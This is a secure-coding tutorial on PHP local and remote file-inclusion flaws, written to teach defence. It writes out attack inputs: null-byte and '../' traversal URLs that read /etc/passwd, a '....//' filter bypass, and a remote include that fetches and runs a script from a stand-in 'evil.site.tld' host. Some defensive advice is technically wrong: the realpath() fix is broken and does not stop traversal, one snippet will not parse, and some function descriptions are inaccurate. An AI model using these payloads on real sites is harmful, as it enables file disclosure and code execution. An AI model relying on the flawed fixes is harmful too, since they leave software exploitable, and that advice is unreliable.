PHP Arbitrary File Include

30 November -0001

A common attack vector used by attackers against web applications is to attempt to convolute the commonly used include(), include_once(), require() and require_once() functions. These functions will include files into the currently executing script, and even evaluate their contents. This can lead to a number of dangerous conditions that expose web applications to attacks.

Suppose you're using the following, common, script in your application:

<?php
	include('header.php');
	include('pages/' . $_GET['page'] . '.php');
	include('footer.php');
?>

The idea here is that the navigation of the site will link to various "pages" in the application by specifying the relative file to be included in the URL. For instance 'index.php?page=about' should include the 'pages/about.php' page and generate page display.

The problem with this method is that it is fairly easy for an attacker to bypass the weak protections imposed and include arbitrary files. One of the most commonly used methods in this attack is to utilize a null byte injection to bypass the concatenation of the '.php' file extension. The null byte is URL encoded as %00. The reason that this works is that PHP is written in C, and C terminates strings at the location of a null byte. Including the null byte causes PHP to terminate the interpretation of the full file path (which should be 'pages/somename%00.php' early and instead simply uses the string 'pages/somename', ignoring the extension altogether). Supposing there is a .htaccess pages in the 'pages/' directory, such that the contents of the directory appear thus:

pages/
	.htaccess
	about.php
	contact.php
	homepage.php
	sitemap.php

An attacker could call the URL 'index.php?page=.htaccess%00' and the contents of the .htaccess file would be included, as plain text, in the rendering of the page. Combining this attack with a directory traversal allows the attacker to include any file from the filesystem that the web server can read. A common target for this attack is the '/etc/passwd' file, which enumerates all the user accounts on the system. Calling the URL 'index.php?page=../../../../../etc/passwd%00' should reveal the file, although the number of '../' in the sequence will vary depending on the application path.

Protecting Against Arbitrary File Include

Protecting against this type of vector is difficult. The best strategy is to limit input to "known good", meaning that one would create an array of known files and only include those files. For instance:

<?php
	$files = array('about', 'contact', 'homepage', 'sitemap');
	if (in_array($_GET['page'], $files)) {
		include_once($files[array_search($_GET['page'], $files)] . '.php');
	}
?>

In this way the filename is being produced from the array, rather than from the user input. This allows the developer to specify the string for inclusion, rather than the attacker, and eliminating user input yields a more robust security posture.

An alternative is to sanitize the user input in some way. There are several functions that are useful for this purpose. The urlencode() function is an interesting one. It takes all special characters (including forward slashes) and translates them into their ASCII HTML equivalent. Using this function in the following way:

<?php
	include('header.php');
	include('pages/' . urlencode($_GET['page']) . '.php');
	include('footer.php');
?>

Will encode an attacker of 'index.php?page=../../../../../etc/passwd%00' and result in the following error:

Warning: include(pages/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.php) [function.include]: failed to open stream: No such file or directory

As you can see the slashes are removed and the null byte is still HTML encoded, thus defeating the null byte string termination. Another interesting option is the basename() function which returns a string containing a path to the file. Using the code:

<?php
	include('header.php');
	include('pages/' . basename($_GET['page']) . '.php'); 
	include('footer.php');
?>

Ensures that only files with the PHP extension are included by preserving the extension concatenation, but this method does NOT defeat against directory traversal. Thus, an attacker can include arbitrary PHP files from the filesystem, a vulnerability they could use to enable attacks chained to an arbitrary file upload vulnerability or other vector. One strategy to defeat this type of attack is to limit input to a limited character set using code such as:

<?php
	include('header.php');
	$page = preg_replace('/[^a-z^A-Z^0-9]*/', '', $_GET['page']);
	include('pages/' . basename($page) . '.php'); 
	include('footer.php');
?>

As you can see, however, this is becoming increasingly complex, which increases the likelihood of error or introducing a vulnerability by omission or oversight.

Another interesting possibility is the realpath() function in PHP. Using the following code:

<?php
	include('header.php');
	include('pages/' . realpath($page) . '.php'); 
	include('footer.php');
?>

Defeats the attack by first reducing a malicious input path by removing all the directives to traverse up one directory ('../'). The function also returns a string, thus defeating the null byte injection. Thus, a malicious $_GET['page'] variable with the value ../../../../../etc/passwd%00 is evaluated by realpath() and the string '/etc/passwd' is derived as the return value. This very handily defeats both the directory traversal and the null byte attacks.

Beware!

Many developers will utilize home grown solutions to this problem rather than utilizing PHP's built in functions. Some developers will use code such as:

<?php
	include('header.php');
	include('pages/' . str_replace("../", '', ($_GET['page'])) . '.php');
	include('footer.php');
?>

While this seems like a good idea it can easily be defeated using clever URL encoding or other tricks. For instance, and attacker who uses the URL 'index.php?page=....//....//....//....//....//etc/passwd%00' completely bypasses this defense. A home brew solution is always a bad idea when tackling a problem like this because it commits the developer to maintaining the code in an ever escalating war against attackers, trying to stay one step ahead of emerging techniques. Because the developer is hopelessly outnumbered by him or herself it is much wiser to rely on a community supported library or native functionality in order to defeat these attack vectors. Doing so allows the developer to offload the commitment of development work to the community, who can produce more timely and efficient defenses against the ever evolving methods of attackers.

Another pitfall is to use the pathinfo() function to check files for inclusion. You should be aware that the pathinfo() function is vulnerable to null byte injection as detailed at http://www.madirish.net/?article=232. It is still useful, but you should be aware that there are some caveats.

Remote File Inclusion

One particularly nasty variant of this attack vector is the remote file include vulnerability. Remote file inclusion allows files from URL's to be included into the executing script. If this feature is enabled in the PHP configuration file (php.ini) like so:

;;;;;;;;;;;;;;;;;;
; Fopen wrappers ;
;;;;;;;;;;;;;;;;;;

; Whether to allow the treatment of URLs (like http:// or ftp://) as files.

allow_url_fopen = On

Then attackers can potentially pull PHP code hosted on remote sites for inclusion into local PHP files. In all of the above examples the file include path is bounded by the prepending of 'pages/' to the include string. This will normally defeat remote file include attacks. However, if our code instead looked thus:

<?php
	include('header.php');
	include($_GET['page']) . '.php');
	include('footer.php');
?>

An attacker might be able to utilize a URL such as 'index.php?page=http://evil.site.tld/script.txt'. In this attack the remotely hosted file must be a plain text file (as the contents of the actual PHP code must be rendered from the evil server so they can be included and interpreted in the PHP file on the target server). This is actually more of a benefit than a hindrance to most attackers as many sites limit file upload types to innocuous, non-interpreted, HTML and plain text formats. Thus, if an attacker hosts the following file as 'script.txt' on 'http://evil.site.tld':

<?php phpinfo();?>

Then the file contents would be included in our example above, causing the header to render, then the phpinfo() command to execute, and finally the footer to be included. This particular attack is especially devastating because an attacker can call any PHP rendered in HTML or text on the web. This means that an attacker could include HTML pages from innocuous sites that present PHP code for demonstration purposes and that code could be rendered on the target.

Conclusion

Being aware of the risk posed by file inclusion attacks is critical to deploying a safe PHP application. If remote files are not needed (as is normally the case) the PHP configuration file should be altered so that allow_url_fopen is set to 'Off'. This is the simplest way to defend against remote file include attacks.

Protecting against local file include vulnerabilities, including directory traversal, is fairly straightforward if the developer utilizes well known and maintained PHP functions to sanitize user input. The best approach is to limit includes to "known good" values, but often times the dynamic nature of sites precludes this option. In such scenarios it is critical to utilize community supported, evolving libraries and functions to sanitize user input. Attempting to "roll your own" solution is undesirable because it is too easy to overlook a potential attack vector and impossible to predict future attacker methods. Using a supported library allows you to harness the power of a development community, and their responsiveness to emerging threats, simply by keeping your system patched and up to date.